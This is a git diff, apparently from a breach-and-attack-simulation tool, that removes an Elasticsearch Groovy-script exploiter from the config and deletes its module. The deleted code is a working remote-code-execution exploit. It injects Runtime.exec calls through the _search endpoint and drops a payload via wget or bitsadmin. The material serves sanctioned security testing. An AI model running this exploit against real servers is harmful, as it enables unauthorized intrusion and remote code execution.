diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index efb9a4350..b1a25d51f 100644 --- a/monkey/infection_monkey/example.conf +++ b/monkey/infection_monkey/example.conf @@ -27,7 +27,6 @@ "SSHExploiter", "SmbExploiter", "WmiExploiter", - "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py deleted file mode 100644 index 6c2751418..000000000 --- a/monkey/infection_monkey/exploit/elasticgroovy.py +++ /dev/null @@ -1,114 +0,0 @@ -""" - Implementation is based on elastic search groovy exploit by metasploit - https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66 - /modules/exploits/multi/elasticsearch/search_groovy_script.rb - Max vulnerable elasticsearch version is "1.4.2" -""" - -import json -import logging -import re - -import requests - -from common.common_consts.network_consts import ES_SERVICE -from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus -from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.model import ( - BITSADMIN_CMDLINE_HTTP, - CHECK_COMMAND, - CMD_PREFIX, - DOWNLOAD_TIMEOUT, - ID_STRING, - WGET_HTTP_UPLOAD, -) -from infection_monkey.network_scanning.elasticfinger import ES_PORT -from infection_monkey.telemetry.attack.t1197_telem import T1197Telem - -logger = logging.getLogger(__name__) - - -class ElasticGroovyExploiter(WebRCE): - # attack URLs - MONKEY_RESULT_FIELD = "monkey_result" - GENERIC_QUERY = ( - """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD - ) - JAVA_CMD = GENERIC_QUERY % ( - """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(""" - """\\"%s\\").getText()""" - ) - - _TARGET_OS_TYPE = ["linux", "windows"] - _EXPLOITED_SERVICE = "Elastic search" - - def __init__(self, host): - super(ElasticGroovyExploiter, self).__init__(host) - - def get_exploit_config(self): - exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() - exploit_config["dropper"] = True - exploit_config["url_extensions"] = ["_search?pretty"] - exploit_config["upload_commands"] = { - "linux": WGET_HTTP_UPLOAD, - "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP, - } - return exploit_config - - def get_open_service_ports(self, port_list, names): - # We must append elastic port we get from elastic fingerprint module because It's not - # marked as 'http' service - valid_ports = WebRCE.get_open_service_ports(self.host, port_list, names) - if ES_SERVICE in self.host.services: - valid_ports.append([ES_PORT, False]) - return valid_ports - - def exploit(self, url, command): - command = re.sub(r"\\", r"\\\\\\\\", command) - payload = self.JAVA_CMD % command - try: - response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT) - except requests.ReadTimeout: - logger.error( - "Elastic couldn't upload monkey, because server didn't respond to upload " - "request." - ) - return False - result = self.get_results(response) - if not result: - return False - return result[0] - - def upload_monkey(self, url, commands=None): - result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands) - if "windows" in self.host.os["type"] and result: - T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send() - return result - - def get_results(self, response): - """ - Extracts the result data from our attack - :return: List of data fields or None - """ - try: - json_resp = json.loads(response.text) - return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD] - except (KeyError, IndexError): - return None - - def check_if_exploitable(self, url): - # Overridden web_rce method that adds CMD prefix for windows command - try: - if "windows" in self.host.os["type"]: - resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND) - else: - resp = self.exploit(url, CHECK_COMMAND) - if resp is True: - return True - elif resp is not False and ID_STRING in resp: - return True - else: - return False - except Exception as e: - logger.error("Host's exploitability check failed due to: %s" % e) - return False